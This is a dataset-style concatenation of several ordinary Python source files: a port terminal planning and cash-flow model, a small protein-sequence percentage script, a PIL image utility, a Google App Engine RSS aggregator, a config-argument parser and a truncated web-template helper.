cash_flows_WACC_real\n\n def add_cashflow_data_to_element(self, element):\n\n \"\"\"Place cashflow data in element dataframe\"\"\"\n\n # years\n years = list(range(self.startyear, self.startyear + self.lifecycle))\n\n # capex\n capex = element.capex\n\n # opex\n maintenance = element.maintenance\n insurance = element.insurance\n labour = element.labour\n\n # year online\n year_online = element.year_online\n year_delivery = element.delivery_time\n\n df = pd.DataFrame()\n\n # years\n df[\"year\"] = years\n\n # capex\n if year_delivery > 1:\n df.loc[df[\"year\"] == year_online - 2, \"capex\"] = 0.6 * capex\n df.loc[df[\"year\"] == year_online - 1, \"capex\"] = 0.4 * capex\n else:\n df.loc[df[\"year\"] == year_online - 1, \"capex\"] = capex\n\n # opex\n if maintenance:\n df.loc[df[\"year\"] >= year_online, \"maintenance\"] = maintenance\n if insurance:\n df.loc[df[\"year\"] >= year_online, \"insurance\"] = insurance\n if labour:\n df.loc[df[\"year\"] >= year_online, \"labour\"] = labour\n\n df.fillna(0, inplace=True)\n\n element.df = df\n\n return element\n\n def WACC_nominal(self, Gearing=60, Re=.10, Rd=.30, Tc=.28):\n \"\"\"Nominal cash flow is the true dollar amount of future revenues the company expects\n to receive and expenses it expects to pay out, including inflation.\n When all cashflows within the model are denoted in real terms and including inflation.\"\"\"\n\n Gearing = Gearing\n Re = Re # return on equity\n Rd = Rd # return on debt\n Tc = Tc # income tax\n E = 100 - Gearing\n D = Gearing\n\n WACC_nominal = ((E / (E + D)) * Re + (D / (E + D)) * Rd) * (1 - Tc)\n\n return WACC_nominal\n\n def WACC_real(self, inflation=0.02): # old: interest=0.0604\n \"\"\"Real cash flow expresses a company's cash flow with adjustments for inflation.\n When all cashflows within the model are denoted in real terms and have been\n adjusted for inflation (no inlfation has been taken into account),\n WACC_real should be used. WACC_real is computed by as follows:\"\"\"\n\n WACC_real = (self.WACC_nominal() + 1) / (inflation + 1) - 1\n\n return WACC_real\n\n def NPV(self):\n \"\"\"Gather data from Terminal elements and combine into a cash flow plot\"\"\"\n\n # add cash flow information for each of the Terminal elements\n cash_flows, cash_flows_WACC_real = self.add_cashflow_elements()\n\n # prepare years, revenue, capex and opex for plotting\n years = cash_flows_WACC_real['year'].values\n revenue = self.revenues\n capex = cash_flows_WACC_real['capex'].values\n opex = cash_flows_WACC_real['insurance'].values + \\\n cash_flows_WACC_real['maintenance'].values + \\\n cash_flows_WACC_real['energy'].values + \\\n cash_flows_WACC_real['demurrage'].values + \\\n cash_flows_WACC_real['labour'].values\n\n PV = - capex - opex + revenue\n print('PV: {}'.format(PV))\n\n print('NPV: {}'.format(np.sum(PV)))\n\n # *** General functions\n\n def find_elements(self, obj):\n \"\"\"return elements of type obj part of self.elements\"\"\"\n\n list_of_elements = []\n if self.elements != []:\n for element in self.elements:\n if isinstance(element, obj):\n list_of_elements.append(element)\n\n return list_of_elements\n\n def calculate_vessel_calls(self, year=2019):\n \"\"\"Calculate volumes to be transported and the number of vessel calls (both per vessel type and in total) \"\"\"\n\n # intialize values to be returned\n handysize_vol = 0\n handymax_vol = 0\n panamax_vol = 0\n total_vol = 0\n\n # gather volumes from each commodity scenario and calculate how much is transported with which vessel\n commodities = self.find_elements(Commodity)\n for commodity in commodities:\n try:\n volume = commodity.scenario_data.loc[commodity.scenario_data['year'] == year]['volume'].item()\n handysize_vol += volume * commodity.handysize_perc / 100\n handymax_vol += volume * commodity.handymax_perc / 100\n panamax_vol += volume * commodity.panamax_perc / 100\n total_vol += volume\n except:\n pass\n\n # gather vessels and calculate the number of calls each vessel type needs to make\n vessels = self.find_elements(Vessel)\n for vessel in vessels:\n if vessel.type == 'Handysize':\n handysize_calls = int(np.ceil(handysize_vol / vessel.call_size))\n elif vessel.type == 'Handymax':\n handymax_calls = int(np.ceil(handymax_vol / vessel.call_size))\n elif vessel.type == 'Panamax':\n panamax_calls = int(np.ceil(panamax_vol / vessel.call_size))\n total_calls = np.sum([handysize_calls, handymax_calls, panamax_calls])\n\n return handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol\n\n def calculate_berth_occupancy(self, year, handysize_calls, handymax_calls, panamax_calls):\n \"\"\"\n - Find all cranes and sum their effective_capacity to get service_capacity\n - Divide callsize_per_vessel by service_capacity and add mooring time to get total time at berth\n - Occupancy is total_time_at_berth divided by operational hours\n \"\"\"\n\n # list all crane objects in system\n list_of_elements_1 = self.find_elements(Cyclic_Unloader)\n list_of_elements_2 = self.find_elements(Continuous_Unloader)\n list_of_elements = list_of_elements_1 + list_of_elements_2\n\n # find the total service rate and determine the time at berth (in hours, per vessel type and in total)\n service_rate_planned = 0\n service_rate_online = 0\n if list_of_elements != []:\n for element in list_of_elements:\n service_rate_planned += element.effective_capacity\n if year >= element.year_online:\n service_rate_online += element.effective_capacity\n\n # estimate berth occupancy\n time_at_berth_handysize_planned = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_planned) +agribulk_defaults.handysize_data[\n \"mooring_time\"])\n time_at_berth_handymax_planned = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_planned) +agribulk_defaults.handymax_data[\n \"mooring_time\"])\n time_at_berth_panamax_planned = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_planned) +agribulk_defaults.panamax_data[\"mooring_time\"])\n\n total_time_at_berth_planned = np.sum(\n [time_at_berth_handysize_planned, time_at_berth_handymax_planned, time_at_berth_panamax_planned])\n\n # berth_occupancy is the total time at berth divided by the operational hours\n berth_occupancy_planned = total_time_at_berth_planned / self.operational_hours\n\n # estimate crane occupancy\n time_at_crane_handysize_planned = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_planned))\n time_at_crane_handymax_planned = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_planned))\n time_at_crane_panamax_planned = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_planned))\n\n total_time_at_crane_planned = np.sum(\n [time_at_crane_handysize_planned, time_at_crane_handymax_planned, time_at_crane_panamax_planned])\n\n # berth_occupancy is the total time at berth divided by the operational hours\n crane_occupancy_planned = total_time_at_crane_planned / self.operational_hours\n\n if service_rate_online != 0:\n time_at_berth_handysize_online = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_online) +agribulk_defaults.handysize_data[\n \"mooring_time\"])\n time_at_berth_handymax_online = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_online) +agribulk_defaults.handymax_data[\n \"mooring_time\"])\n time_at_berth_panamax_online = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_online) +agribulk_defaults.panamax_data[\n \"mooring_time\"])\n\n total_time_at_berth_online = np.sum(\n [time_at_berth_handysize_online, time_at_berth_handymax_online, time_at_berth_panamax_online])\n\n # berth_occupancy is the total time at berth devided by the operational hours\n berth_occupancy_online = min([total_time_at_berth_online / self.operational_hours, 1])\n\n time_at_crane_handysize_online = handysize_calls * (\n (agribulk_defaults.handysize_data[\"call_size\"] / service_rate_online))\n time_at_crane_handymax_online = handymax_calls * (\n (agribulk_defaults.handymax_data[\"call_size\"] / service_rate_online))\n time_at_crane_panamax_online = panamax_calls * (\n (agribulk_defaults.panamax_data[\"call_size\"] / service_rate_online))\n\n total_time_at_crane_online = np.sum(\n [time_at_crane_handysize_online, time_at_crane_handymax_online, time_at_crane_panamax_online])\n\n # berth_occupancy is the total time at berth devided by the operational hours\n crane_occupancy_online = min([total_time_at_crane_online / self.operational_hours, 1])\n\n else:\n berth_occupancy_online = float(\"inf\")\n crane_occupancy_online = float(\"inf\")\n\n else:\n # if there are no cranes the berth occupancy is 'infinite' so a berth is certainly needed\n berth_occupancy_planned = float(\"inf\")\n berth_occupancy_online = float(\"inf\")\n crane_occupancy_planned = float(\"inf\")\n crane_occupancy_online = float(\"inf\")\n\n return berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online\n\n def waiting_time(self, year):\n \"\"\"\n - Import the berth occupancy of every year\n - Find the factor for the waiting time with the E2/E/n quing theory using 4th order polynomial regression\n - Waiting time is the factor times the crane occupancy\n \"\"\"\n\n handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize_calls, handymax_calls, panamax_calls)\n\n # find the different factors which are linked to the number of berths\n berths = len(self.find_elements(Berth))\n\n if berths == 1:\n factor = max(0,\n 79.726 * berth_occupancy_online ** 4 - 126.47 * berth_occupancy_online ** 3 + 70.660 * berth_occupancy_online ** 2 - 14.651 * berth_occupancy_online + 0.9218)\n elif berths == 2:\n factor = max(0,\n 29.825 * berth_occupancy_online ** 4 - 46.489 * berth_occupancy_online ** 3 + 25.656 * berth_occupancy_online ** 2 - 5.3517 * berth_occupancy_online + 0.3376)\n elif berths == 3:\n factor = max(0,\n 19.362 * berth_occupancy_online ** 4 - 30.388 * berth_occupancy_online ** 3 + 16.791 * berth_occupancy_online ** 2 - 3.5457 * berth_occupancy_online + 0.2253)\n elif berths == 4:\n factor = max(0,\n 17.334 * berth_occupancy_online ** 4 - 27.745 * berth_occupancy_online ** 3 + 15.432 * berth_occupancy_online ** 2 - 3.2725 * berth_occupancy_online + 0.2080)\n elif berths == 5:\n factor = max(0,\n 11.149 * berth_occupancy_online ** 4 - 17.339 * berth_occupancy_online ** 3 + 9.4010 * berth_occupancy_online ** 2 - 1.9687 * berth_occupancy_online + 0.1247)\n elif berths == 6:\n factor = max(0,\n 10.512 * berth_occupancy_online ** 4 - 16.390 * berth_occupancy_online ** 3 + 8.8292 * berth_occupancy_online ** 2 - 1.8368 * berth_occupancy_online + 0.1158)\n elif berths == 7:\n factor = max(0,\n 8.4371 * berth_occupancy_online ** 4 - 13.226 * berth_occupancy_online ** 3 + 7.1446 * berth_occupancy_online ** 2 - 1.4902 * berth_occupancy_online + 0.0941)\n else:\n # if there are no berths the occupancy is 'infinite' so a berth is certainly needed\n factor = float(\"inf\")\n\n waiting_time_hours = factor * crane_occupancy_online * self.operational_hours / total_calls\n waiting_time_occupancy = waiting_time_hours * total_calls / self.operational_hours\n\n return factor, waiting_time_occupancy\n\n def calculate_station_occupancy(self, year):\n \"\"\"\n - Find all stations and sum their service_rate to get service_capacity in TUE per hours\n - Divide the throughput by the service rate to get the total hours in a year\n - Occupancy is total_time_at_station divided by operational hours\n \"\"\"\n\n list_of_elements = self.find_elements(Unloading_station)\n # find the total service rate and determine the time at station\n\n service_rate_planned = 0\n service_rate_online = 0\n if list_of_elements != []:\n for element in list_of_elements:\n service_rate_planned += element.service_rate\n if year >= element.year_online:\n service_rate_online += element.service_rate\n\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n # find the total throughput,\n service_rate_throughput = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate_throughput += element.effective_capacity * crane_occupancy_online\n\n time_at_station_planned = service_rate_throughput * self.operational_hours / service_rate_planned # element.service_rate\n\n # station_occupancy is the total time at station divided by the operational hours\n station_occupancy_planned = time_at_station_planned / self.operational_hours\n\n if service_rate_online != 0:\n time_at_station_online = service_rate_throughput * self.operational_hours / service_rate_online # element.capacity\n\n # station occupancy is the total time at station divided by the operational hours\n station_occupancy_online = min([time_at_station_online / self.operational_hours, 1])\n else:\n station_occupancy_online = float(\"inf\")\n\n else:\n # if there are no cranes the berth occupancy is 'infinite' so a berth is certainly needed\n station_occupancy_planned = float(\"inf\")\n station_occupancy_online = float(\"inf\")\n\n return station_occupancy_planned, station_occupancy_online\n\n def check_crane_slot_available(self):\n list_of_elements = self.find_elements(Berth)\n slots = 0\n for element in list_of_elements:\n slots += element.max_cranes\n\n list_of_elements_1 = self.find_elements(Cyclic_Unloader)\n list_of_elements_2 = self.find_elements(Continuous_Unloader)\n list_of_elements = list_of_elements_1 + list_of_elements_2\n\n # when there are more slots than installed cranes ...\n if slots > len(list_of_elements):\n return True\n else:\n return False\n\n def report_element(self, Element, year):\n elements = 0\n elements_online = 0\n element_name = []\n list_of_elements = self.find_elements(Element)\n if list_of_elements != []:\n for element in list_of_elements:\n element_name = element.name\n elements += 1\n if year >= element.year_online:\n elements_online += 1\n\n if self.debug:\n print(' a total of {} {} is online; {} total planned'.format(elements_online, element_name, elements))\n\n return elements_online, elements\n\n def train_call(self, year):\n \"\"\"Calculation of the train calls per year, this is calculated from:\n - find out how much throughput there is\n - find out how much cargo the train can transport\n - calculate the numbers of train calls\"\"\"\n\n station = Unloading_station(**agribulk_defaults.hinterland_station_data)\n\n # - Trains calculated with the throughput\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n service_rate_throughput = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate_throughput += element.effective_capacity * crane_occupancy_online\n\n train_calls = service_rate_throughput * self.operational_hours / station.call_size\n\n return train_calls\n\n # *** plotting functions\n\n def terminal_elements_plot(self, width=0.1, alpha=0.6):\n \"\"\"Gather data from Terminal and plot which elements come online when\"\"\"\n\n # collect elements to add to plot\n years = []\n berths = []\n cranes = []\n quays = []\n conveyors_quay = []\n storages = []\n conveyors_hinterland = []\n unloading_station = []\n\n for year in range(self.startyear, self.startyear + self.lifecycle):\n years.append(year)\n berths.append(0)\n quays.append(0)\n cranes.append(0)\n conveyors_quay.append(0)\n storages.append(0)\n conveyors_hinterland.append(0)\n unloading_station.append(0)\n\n for element in self.elements:\n if isinstance(element, Berth):\n if year >= element.year_online:\n berths[-1] += 1\n if isinstance(element, Quay_wall):\n if year >= element.year_online:\n quays[-1] += 1\n if isinstance(element, Cyclic_Unloader) | isinstance(element, Continuous_Unloader):\n if year >= element.year_online:\n cranes[-1] += 1\n if isinstance(element, Conveyor_Quay):\n if year >= element.year_online:\n conveyors_quay[-1] += 1\n if isinstance(element, Storage):\n if year >= element.year_online:\n storages[-1] += 1\n if isinstance(element, Conveyor_Hinter):\n if year >= element.year_online:\n conveyors_hinterland[-1] += 1\n if isinstance(element, Unloading_station):\n if year >= element.year_online:\n unloading_station[-1] += 1\n\n # generate plot\n fig, ax = plt.subplots(figsize=(20, 10))\n\n ax.bar([x + 0 * width for x in years], berths, width=width, alpha=alpha, label=\"berths\", color='coral',\n edgecolor='crimson')\n ax.bar([x + 1 * width for x in years], quays, width=width, alpha=alpha, label=\"quays\", color='orchid',\n edgecolor='purple')\n ax.bar([x + 2 * width for x in years], cranes, width=width, alpha=alpha, label=\"cranes\", color='lightblue',\n edgecolor='blue')\n ax.bar([x + 3 * width for x in years], conveyors_quay, width=width, alpha=alpha, label=\"conveyors quay\",\n color='lightgreen', edgecolor='green')\n ax.bar([x + 4 * width for x in years], storages, width=width, alpha=alpha, label=\"storages\", color='orange',\n edgecolor='orangered')\n ax.bar([x + 5 * width for x in years], conveyors_hinterland, width=width, alpha=alpha, label=\"conveyors hinter\",\n color='grey', edgecolor='black')\n ax.bar([x + 6 * width for x in years], unloading_station, width=width, alpha=alpha, label=\"unloading station\",\n color='red', edgecolor='black')\n\n ax.set_xlabel('Years')\n ax.set_ylabel('Elements on line [nr]')\n ax.set_title('Terminal elements online ({})'.format(self.crane_type_defaults['crane_type']))\n ax.set_xticks([x for x in years])\n ax.set_xticklabels(years)\n ax.legend()\n\n def terminal_capacity_plot(self, width=0.25, alpha=0.6):\n \"\"\"Gather data from Terminal and plot which elements come online when\"\"\"\n\n # get crane service capacity and storage capacity\n years = []\n cranes = []\n cranes_capacity = []\n storages = []\n storages_capacity = []\n\n for year in range(self.startyear, self.startyear + self.lifecycle):\n\n years.append(year)\n cranes.append(0)\n cranes_capacity.append(0)\n storages.append(0)\n storages_capacity.append(0)\n\n handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize_calls, handymax_calls, panamax_calls)\n\n for element in self.elements:\n if isinstance(element, Cyclic_Unloader) | isinstance(element, Continuous_Unloader):\n # calculate cranes service capacity: effective_capacity * operational hours * berth_occupancy?\n if year >= element.year_online:\n cranes[-1] += 1\n cranes_capacity[\n -1] += element.effective_capacity * self.operational_hours * crane_occupancy_online\n if isinstance(element, Storage):\n if year >= element.year_online:\n storages[-1] += 1\n storages_capacity[-1] += element.capacity * 365 / 18\n\n # get demand\n demand = pd.DataFrame()\n demand['year'] = list(range(self.startyear, self.startyear + self.lifecycle))\n demand['demand'] = 0\n for commodity in self.find_elements(Commodity):\n try:\n for column in commodity.scenario_data.columns:\n if column in commodity.scenario_data.columns and column != \"year\":\n demand['demand'] += commodity.scenario_data[column]\n except:\n pass\n # generate plot\n fig, ax = plt.subplots(figsize=(20, 10))\n\n ax.bar([x - 0.5 * width for x in years], cranes_capacity, width=width, alpha=alpha, label=\"cranes capacity\",\n color='red')\n # ax.bar([x + 0.5 * width for x in years], storages_capacity, width=width, alpha=alpha, label=\"storages\",\n # color='green')\n ax.step(years, demand['demand'].values, label=\"demand\", where='mid')\n\n ax.set_xlabel('Years')\n ax.set_ylabel('Throughput capacity [tons/year]')\n ax.set_title('Terminal capacity online ({})'.format(self.crane_type_defaults['crane_type']))\n ax.set_xticks([x for x in years])\n ax.set_xticklabels(years)\n ax.legend()\n\n def cashflow_plot(self, cash_flows, width=0.3, alpha=0.6):\n \"\"\"Gather data from Terminal elements and combine into a cash flow plot\"\"\"\n\n # prepare years, revenue, capex and opex for plotting\n years = cash_flows['year'].values\n revenue = self.revenues\n capex = cash_flows['capex'].values\n opex = cash_flows['insurance'].values + cash_flows['maintenance'].values + cash_flows['energy'].values + \\\n cash_flows['labour'].values + cash_flows['demurrage'].values\n\n # sum cash flows to get profits as a function of year\n profits = []\n for year in years:\n profits.append(-cash_flows.loc[cash_flows['year'] == year]['capex'].item() -\n cash_flows.loc[cash_flows['year'] == year]['insurance'].item() -\n cash_flows.loc[cash_flows['year'] == year]['maintenance'].item() -\n cash_flows.loc[cash_flows['year'] == year]['energy'].item() -\n cash_flows.loc[cash_flows['year'] == year]['labour'].item() -\n cash_flows.loc[cash_flows['year'] == year]['demurrage'].item() +\n revenue[cash_flows.loc[cash_flows['year'] == year].index.item()])\n\n # cumulatively sum profits to get profits_cum\n profits_cum = [None] * len(profits)\n for index, value in enumerate(profits):\n if index == 0:\n profits_cum[index] = 0\n else:\n profits_cum[index] = profits_cum[index - 1] + profits[index]\n\n # generate plot\n fig, ax = plt.subplots(figsize=(16, 7))\n\n ax.bar([x - width for x in years], -opex, width=width, alpha=alpha, label=\"opex\", color='lightblue')\n ax.bar(years, -capex, width=width, alpha=alpha, label=\"capex\", color='red')\n ax.bar([x + width for x in years], revenue, width=width, alpha=alpha, label=\"revenue\", color='lightgreen')\n ax.step(years, profits, label='profits', where='mid')\n ax.step(years, profits_cum, label='profits_cum', where='mid')\n\n ax.set_xlabel('Years')\n ax.set_ylabel('Cashflow [000 M $]')\n ax.set_title('Cash flow plot')\n ax.set_xticks([x for x in years])\n ax.set_xticklabels(years)\n ax.legend()\n","sub_path":"opentisim/agribulk_system.py","file_name":"agribulk_system.py","file_ext":"py","file_size_in_byte":65837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"382156103","text":"#!/usr/bin/python3\n\ndef percentage(pro_seq,aa_residue=\"aILMFWYV\"):\n\taa_residue = list(aa_residue)\n\taalist_length = len(aa_residue)\n\taa_number = list(range(aalist_length))\n\tfor i in range(aalist_length): \n\t\taa_number[i] = pro_seq.upper().count(aa_residue[i].upper())\n\tpercentage = sum(aa_number)/len(pro_seq)*100\n\tprint(aa_number,percentage)\n\t\n#percentage(\"MSRSLLLRFLLFLLLLPPLP\",[\"M\"])\n#percentage(\"MSRSLLLRFLLFLLLLPPLP\", ['F', 'S', 'L'])\n\npercentage(\"MSRSLLLRFLLFLLLLPPLP\")\n#assert round(percentage(\"MSRSLLLRFLLFLLLLPPLP\")) == 65\n","sub_path":"Lecture14/lecture14_ex02.py","file_name":"lecture14_ex02.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"122369230","text":"from PIL import Image,ImageFilter\n\ndef concat(out, Ins):\n #concat out/concat.png img/S.png img/A.png img/M.png img/P.png img/L.png img/E.png\n Images = [Image.open(path) for path in Ins]\n ws = map(lambda im:im.width,Images)\n d = Image.new(\"L\",(sum(ws),Images[0].height))\n w = 0\n for i in Images:\n d.paste(i,(w,0))\n w+=i.width\n d.save(out)\n\n\ndef rotate(out, rotation, In):\n # rotate out/rotate.png 90 img/A.png\n before = Image.open(In)\n after = before.rotate(-rotation)\n after.save(out)\n\ndef resize(out, ratio, In):\n # resize out/resize.png 0.5 img/B.png\n before = Image.open(In)\n h,w = before.size\n after = before.resize((int(h*ratio),int(w*ratio)))\n after.save(out)\n\ndef edge(out, In):\n # edge out/edge.png ./sample/sample.png\n img = Image.open(In)\n filtered = img.filter(ImageFilter.FIND_EDGES)\n filtered.save(out)\n\n\ndef main(argv):\n # このコードは引数と標準出力を用いたサンプルコードです。\n # このコードは好きなように編集・削除してもらっ��構いません。\n # ---\n # This is a sample code to use arguments and outputs.\n # Edit and remove this code as you like.\n if argv[0] == \"concat\":\n concat(argv[1],argv[2:])\n elif argv[0] == \"rotate\":\n rotate(argv[1],int(argv[2]),argv[3])\n elif argv[0] == \"resize\":\n resize(argv[1],float(argv[2]),argv[3])\n elif argv[0] == \"edge\":\n edge(argv[1],argv[2])\n else:\n pass\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"611798002","text":"import fix_path\nimport webapp2 as webapp\nfrom google.appengine.api import urlfetch\nfrom google.appengine.api import taskqueue\nfrom google.appengine.ext import blobstore\nfrom google.appengine.api import images\nfrom google.appengine.api import files\nfrom google.appengine.api import memcache\nfrom apps import DEBUG\nfrom apps.models import *\nimport logging, yaml, re, datetime\nfrom feedparser import feedparser\nfrom readability.readability import Document\nfrom pyquery import PyQuery\n\n# Load feeds from a yaml file\nclass LoadFeedsHandler(webapp.RequestHandler):\n def get(self):\n \"\"\" Load feeds from data/feeds.yaml \"\"\"\n f = open('data/feeds.yaml', 'r')\n array = yaml.load(f)\n\n feeds = []\n for item in array:\n name = item['name']\n link = item['link']\n\n feed = Feed.all().filter('name =', name).get()\n if feed is None:\n feed = Feed(name=name, link=link, updated=datetime.datetime.now())\n else:\n feed.name = name\n feed.link = link\n feed.updated = datetime.datetime.now()\n\n feeds.append(feed)\n\n db.put(feeds)\n self.response.out.write('load-feeds: done')\n\n# Fetch and parse feeds\nclass UpdateFeedsHandler(webapp.RequestHandler):\n def get(self):\n for feed in Feed.all():\n taskqueue.add(queue_name='update-feeds', url='/aggregator/update-single-feed', params={'id': feed.key().id_or_name()}, method='GET')\n self.response.out.write('update-feeds: done')\n\n# Fetch and parse a single feed\nclass UpdateSingleFeedHandler(webapp.RequestHandler):\n def get(self):\n feedId = long(self.request.get('id'))\n feed = Feed.get_by_id(feedId)\n\n res = urlfetch.fetch(feed.link, deadline=20)\n data = feedparser.parse(res.content)\n feedUpdated = data['feed']['updated_parsed']\n feedUpdated = datetime.datetime(*feedUpdated[:6]) # convert `time.struct_time` into a `datetime.datetime` object\n\n if feedUpdated != feed.updated:\n toSave = []\n toFetch = []\n for entry in data.entries:\n # Skip empty entries\n if not hasattr(entry, 'summary'):\n continue\n\n articleUpdated = entry.updated_parsed\n articleUpdated = datetime.datetime(*articleUpdated[:6]) # convert `time.struct_time` into a `datetime.datetime` object\n summary = re.sub(r'<.*?>', '', entry.summary)\n summary = re.sub(r' ', '', summary)\n\n a = Article.all().filter(\"link =\", entry.link).get()\n if a is None:\n a = Article(title=entry.title, link=entry.link, feed=feed, updated=articleUpdated, summary=summary)\n toSave.append(a)\n toFetch.append(a)\n elif a.updated != articleUpdated:\n a.title = entry.title\n a.updated = articleUpdated\n a.summary = summary\n toSave.append(a)\n toFetch.append(a)\n\n feed.updated = feedUpdated\n toSave.append(feed)\n db.put(toSave)\n\n # Fetch full texts of articles\n for a in toFetch:\n taskqueue.add(queue_name='get-full-article', url='/aggregator/get-full-article', params={'link': a.link, 'id': a.key().id_or_name()}, method='GET')\n\n# Fetch full texts of articles\nclass GetFullArticleHandler(webapp.RequestHandler):\n def get(self):\n articleId = long(self.request.get('id'))\n article = Article.get_by_id(articleId)\n\n link = self.request.get('link')\n res = urlfetch.fetch(link, deadline=20)\n html = Document(res.content).summary()\n\n S = PyQuery(html)\n article.origImageUrl = S(\"img:first\").attr('src')\n article.imageUrl = None\n article.body = html\n article.put()\n\n if article.origImageUrl is not None and article.imageUrl is None:\n taskqueue.add(queue_name='upload-images', url='/aggregator/upload-article-image', params={'link': article.origImageUrl, 'id': articleId}, method='GET')\n\n self.response.out.write('OK')\n\n# Resize and cache thumbnails\nclass UploadArticleImageHandler(webapp.RequestHandler):\n def get(self):\n articleId = long(self.request.get('id'))\n article = Article.get_by_id(articleId)\n\n link = self.request.get('link')\n res = urlfetch.fetch(link, deadline=20)\n if res.status_code == 200:\n img = images.Image(res.content)\n\n if img.width < 100:\n article.origImageUrl = None\n article.imageUrl = None\n else:\n img.resize(width=150)\n img.im_feeling_lucky()\n imageData = img.execute_transforms(output_encoding=images.JPEG)\n\n # Create the file\n file_name = files.blobstore.create(mime_type='image/jpeg')\n\n # Open the file and write to it\n with files.open(file_name, 'a') as f:\n f.write(imageData)\n\n # Finalize the file. Do this before attempting to read it.\n files.finalize(file_name)\n\n # Get the file's blob key\n blob_key = files.blobstore.get_blob_key(file_name)\n\n # Save the blob key and image serving url in the Article\n article.imageBlob = blob_key\n article.imageUrl = images.get_serving_url(blob_key)\n\n article.put()\n self.response.out.write('OK')\n\n# Flush memcache\nclass FlushMemcacheHandler(webapp.RequestHandler):\n def get(self):\n memcache.flush_all()\n self.response.out.write('flush-memcache: done')\n\n# Purge old articles\nclass PurgeOldArticlesHandler(webapp.RequestHandler):\n def get(self):\n oneDayAgo = datetime.datetime.now() - datetime.timedelta(days=1)\n toDelete = []\n blobsToDelete = []\n\n for a in Article.all().filter(\"updated <\", oneDayAgo):\n toDelete.append(a)\n if a.imageBlob is not None:\n blobsToDelete.append(a.imageBlob.key())\n\n db.delete(toDelete)\n blobstore.delete(blobsToDelete)\n self.response.out.write('purge-old-articles: done')\n\n#\n# Application\n#\napp = webapp.WSGIApplication([\n (r'/aggregator/load-feeds', LoadFeedsHandler),\n (r'/aggregator/update-feeds', UpdateFeedsHandler),\n (r'/aggregator/update-single-feed', UpdateSingleFeedHandler),\n (r'/aggregator/get-full-article', GetFullArticleHandler),\n (r'/aggregator/upload-article-image', UploadArticleImageHandler),\n (r'/aggregator/flush-memcache', FlushMemcacheHandler),\n (r'/aggregator/purge-old-articles', PurgeOldArticlesHandler)\n], debug=DEBUG)\n","sub_path":"server/apps/aggregator.py","file_name":"aggregator.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"350727572","text":"import argparse\nimport json\n\nfrom easydict import EasyDict\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-cfg', '--config', type=str, required=True,\n help='Config file name?')\n parser.add_argument('-wkrs', '--num_workers', default=-1, type=int,\n \t\t\t\t\thelp='Number of workers for dataloaders?')\n parser.add_argument('-bsize', '--batch_size', default=-1, type=int,\n \t\t\t\t\thelp='Batch size for datloaders?')\n return parser.parse_args()\n\ndef get_config():\n args = get_args()\n with open('configs/'+args.config) as f:\n config = EasyDict(json.load(f))\n\n if args.num_workers != -1: \n config.num_workers = args.num_workers\n if args.batch_size != -1: \n config.batch_size = args.batch_size\n\n return config\n\ndef get_device():\n parser = argparse.ArgumentParser()\n parser.add_argument('-g', '--gpu', type=int, required=True,\n help='GPU number?')\n return 'cuda:{}'.format(parser.parse_args().gpu)","sub_path":"utils/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"500711656","text":"from jinja2 import FileSystemLoader, Environment\nimport time\nimport os\n\n\ndef log(*args, **kwargs):\n # time.time() 返回 unix time\n # 把 unix time 转换为普通人类可以看懂的格式\n formation = ''\n value = time.localtime(int(time.time()))\n dt = time.strftime(formation, value)\n # 追加模式写入文件\n with open('log.gua.txt', 'a', encoding='utf-8') as f:\n print(dt, *args, file=f, **kwargs)\n\n\n# __file__ 就是本文件的名字\n# 得到用于加载模板的目录\ntemplate_path = '{}/template/'.format(os.path.dirname(__file__))\n# 创建一个加载器, #jinja会从这个目录中加载模板\nloader = FileSystemLoader(template_path)\n# 用加载器创建一个环境, 有了它才能读取模板文件\nenv = Environment(loader)\n\n\ndef template(t_path, **kwargs):\n \"\"\"\n 本函数接受一个路径和一系列参数\n 读取模板并渲染返回\n \"\"\"\n t = env.get_template(t_path)\n return t.render(**kwargs)\n\n\ndef response_with_headers(headers, status_code=200):\n header = 'HTTP/1.1 {}\\r\\n OK'.format(status_code)\n header += 